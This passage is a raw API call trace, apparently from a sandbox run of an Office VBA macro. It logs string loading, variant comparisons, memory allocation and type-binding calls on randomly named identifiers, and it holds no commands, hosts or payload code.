pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347cec, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0060.345] VarCmp (pvarLeft=0x347c8c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347c8c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347c8c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.345] VarCmp (pvarLeft=0x347c1c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347c1c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.345] VarCmp (pvarLeft=0x347c1c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0060.345] VarCmp (pvarLeft=0x347bdc, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.346] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x346480 | out: pbstrResult=0x346480) returned 0x0 [0060.346] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x345fd0, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0060.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34620c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0060.347] VarBstrCat (in: bstrLeft="", bstrRight="True", pbstrResult=0x346480 | out: pbstrResult=0x346480) returned 0x0 [0060.348] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x345fd0, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0060.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34620c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0060.348] VarCmp (pvarLeft=0x34797c, pvarRight=0x347ddc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0060.348] VarBstrCat (in: bstrLeft="", bstrRight="244", pbstrResult=0x346480 | out: pbstrResult=0x346480) returned 0x0 [0060.348] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x345fd0, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0060.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34620c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0060.349] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x345fd0, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0060.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34620c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0060.349] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x345fd0, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0060.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34620c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0060.349] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x345fd0, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0060.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34620c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0060.350] CRetailMalloc_Realloc () returned 0x87163e0 [0060.350] CRetailMalloc_Realloc () returned 0x87504c0 [0060.350] ITypeComp:RemoteBind (in: This=0x87ce890, szName="B6Lt3sA", lHashVal=0x107a56, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf8a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf8a) returned 0x0 [0060.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f0296, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="B6Lt3sA") returned 8 [0060.350] ITypeComp:RemoteBind (in: This=0x87ce668, szName="B6Lt3sA", lHashVal=0x107a56, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf8a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf8a) returned 0x0 [0060.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f0296, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="B6Lt3sA") returned 8 [0060.351] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="B6Lt3sA", lHashVal=0x107a56, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf8a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf8a) returned 0x0 [0060.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f0296, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="B6Lt3sA") returned 8 [0060.351] ITypeComp:RemoteBind (in: This=0x87cef08, szName="B6Lt3sA", lHashVal=0x107a56, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf8a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf8a) returned 0x0 [0060.351] CRetailMalloc_Alloc () returned 0x87fc638 [0060.352] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0296 | out: _Dst=0x87fc638) returned 0x0 [0060.352] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d21c92, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_B6Lt3sA") returned 15 [0060.352] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_B6Lt3sA", lHashVal=0x107dda, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.352] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0296 | out: _Dst=0x345c9c) returned 0x0 [0060.352] CRetailMalloc_Free () returned 0x6b30301 [0060.353] ITypeComp:RemoteBind (in: This=0x87ce890, szName="exmw1DF", lHashVal=0x1045a8, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf8e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf8e) returned 0x0 [0060.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f02de, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="exmw1DF") returned 8 [0060.353] ITypeComp:RemoteBind (in: This=0x87ce668, szName="exmw1DF", lHashVal=0x1045a8, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf8e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf8e) returned 0x0 [0060.353] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="exmw1DF", lHashVal=0x1045a8, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf8e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf8e) returned 0x0 [0060.354] ITypeComp:RemoteBind (in: This=0x87cef08, szName="exmw1DF", lHashVal=0x1045a8, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf8e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf8e) returned 0x0 [0060.354] CRetailMalloc_Alloc () returned 0x87fc638 [0060.354] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f02de | out: _Dst=0x87fc638) returned 0x0 [0060.354] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="hQgfiq4T", cchCount1=-1, lpString2="_B_var_exmw1DF", cchCount2=-1) returned 3 [0060.354] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.355] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_exmw1DF", lHashVal=0x10492c, wFlags=0x3, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.355] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f02de | out: _Dst=0x345c9c) returned 0x0 [0060.355] CRetailMalloc_Free () returned 0x6b30301 [0060.355] ITypeComp:RemoteBind (in: This=0x87ce890, szName="SozIKB", lHashVal=0x1063a0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf8c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf8c) returned 0x0 [0060.355] ITypeComp:RemoteBind (in: This=0x87ce668, szName="SozIKB", lHashVal=0x1063a0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf8c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf8c) returned 0x0 [0060.355] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="SozIKB", lHashVal=0x1063a0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf8c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf8c) returned 0x0 [0060.356] ITypeComp:RemoteBind (in: This=0x87cef08, szName="SozIKB", lHashVal=0x1063a0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf8c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf8c) returned 0x0 [0060.356] CRetailMalloc_Alloc () returned 0x87fc638 [0060.356] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f02ba | out: _Dst=0x87fc638) returned 0x0 [0060.356] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.357] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_SozIKB", lHashVal=0x10de49, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.357] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f02ba | out: _Dst=0x345c9c) returned 0x0 [0060.357] CRetailMalloc_Free () returned 0x6b30301 [0060.357] ITypeComp:RemoteBind (in: This=0x87ce890, szName="YvLQXW1", lHashVal=0x1059f8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf90 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf90) returned 0x0 [0060.357] ITypeComp:RemoteBind (in: This=0x87ce668, szName="YvLQXW1", lHashVal=0x1059f8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf90 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf90) returned 0x0 [0060.357] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="YvLQXW1", lHashVal=0x1059f8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf90 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf90) returned 0x0 [0060.358] ITypeComp:RemoteBind (in: This=0x87cef08, szName="YvLQXW1", lHashVal=0x1059f8, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf90 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf90) returned 0x0 [0060.358] CRetailMalloc_Alloc () returned 0x87fc638 [0060.358] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0302 | out: _Dst=0x87fc638) returned 0x0 [0060.358] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.359] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_YvLQXW1", lHashVal=0x105d7c, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.359] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0302 | out: _Dst=0x345c9c) returned 0x0 [0060.359] CRetailMalloc_Free () returned 0x6b30301 [0060.359] ITypeComp:RemoteBind (in: This=0x87ce890, szName="GsHBJd6Wv", lHashVal=0x104866, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf92 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf92) returned 0x0 [0060.359] ITypeComp:RemoteBind (in: This=0x87ce668, szName="GsHBJd6Wv", lHashVal=0x104866, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf92 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf92) returned 0x0 [0060.359] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="GsHBJd6Wv", lHashVal=0x104866, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf92 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf92) returned 0x0 [0060.360] ITypeComp:RemoteBind (in: This=0x87cef08, szName="GsHBJd6Wv", lHashVal=0x104866, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf92 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf92) returned 0x0 [0060.360] CRetailMalloc_Alloc () returned 0x87504e0 [0060.360] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0326 | out: _Dst=0x87504e0) returned 0x0 [0060.360] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="HJLgC", cchCount1=-1, lpString2="_B_var_GsHBJd6Wv", cchCount2=-1) returned 3 [0060.361] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.361] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_GsHBJd6Wv", lHashVal=0x10422a, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.361] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0326 | out: _Dst=0x345c9c) returned 0x0 [0060.361] CRetailMalloc_Free () returned 0xcae0401 [0060.361] ITypeComp:RemoteBind (in: This=0x87ce890, szName="mtLKiT9k", lHashVal=0x105032, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf94 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf94) returned 0x0 [0060.361] ITypeComp:RemoteBind (in: This=0x87ce668, szName="mtLKiT9k", lHashVal=0x105032, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf94 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf94) returned 0x0 [0060.361] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="mtLKiT9k", lHashVal=0x105032, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf94 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf94) returned 0x0 [0060.362] ITypeComp:RemoteBind (in: This=0x87cef08, szName="mtLKiT9k", lHashVal=0x105032, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf94 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf94) returned 0x0 [0060.362] CRetailMalloc_Alloc () returned 0x87fc638 [0060.362] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f034e | out: _Dst=0x87fc638) returned 0x0 [0060.363] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.363] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_mtLKiT9k", lHashVal=0x1027bb, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.363] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f034e | out: _Dst=0x345c9c) returned 0x0 [0060.363] CRetailMalloc_Free () returned 0x6b30301 [0060.363] ITypeComp:RemoteBind (in: This=0x87ce890, szName="dWS5U", lHashVal=0x106180, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf96 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf96) returned 0x0 [0060.363] ITypeComp:RemoteBind (in: This=0x87ce668, szName="dWS5U", lHashVal=0x106180, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf96 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf96) returned 0x0 [0060.363] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="dWS5U", lHashVal=0x106180, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf96 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf96) returned 0x0 [0060.364] ITypeComp:RemoteBind (in: This=0x87cef08, szName="dWS5U", lHashVal=0x106180, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf96 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf96) returned 0x0 [0060.364] CRetailMalloc_Alloc () returned 0x87fc638 [0060.364] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0376 | out: _Dst=0x87fc638) returned 0x0 [0060.365] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.365] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_dWS5U", lHashVal=0x10256d, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.365] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0376 | out: _Dst=0x345c9c) returned 0x0 [0060.365] CRetailMalloc_Realloc () returned 0x6210a88 [0060.365] CRetailMalloc_Free () returned 0x6b30301 [0060.365] ITypeComp:RemoteBind (in: This=0x87ce890, szName="qI6GwBfYb", lHashVal=0x109da0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf98 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf98) returned 0x0 [0060.365] ITypeComp:RemoteBind (in: This=0x87ce668, szName="qI6GwBfYb", lHashVal=0x109da0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf98 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf98) returned 0x0 [0060.365] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="qI6GwBfYb", lHashVal=0x109da0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf98 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf98) returned 0x0 [0060.366] ITypeComp:RemoteBind (in: This=0x87cef08, szName="qI6GwBfYb", lHashVal=0x109da0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf98 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf98) returned 0x0 [0060.366] CRetailMalloc_Alloc () returned 0x87504e0 [0060.366] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f039a | out: _Dst=0x87504e0) returned 0x0 [0060.367] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.367] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_qI6GwBfYb", lHashVal=0x10a6e5, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.367] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f039a | out: _Dst=0x345c9c) returned 0x0 [0060.367] CRetailMalloc_Free () returned 0xcae0401 [0060.367] ITypeComp:RemoteBind (in: This=0x87ce890, szName="f8d0jqy", lHashVal=0x10c5f2, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf9a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf9a) returned 0x0 [0060.367] ITypeComp:RemoteBind (in: This=0x87ce668, szName="f8d0jqy", lHashVal=0x10c5f2, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf9a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf9a) returned 0x0 [0060.367] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="f8d0jqy", lHashVal=0x10c5f2, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf9a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, 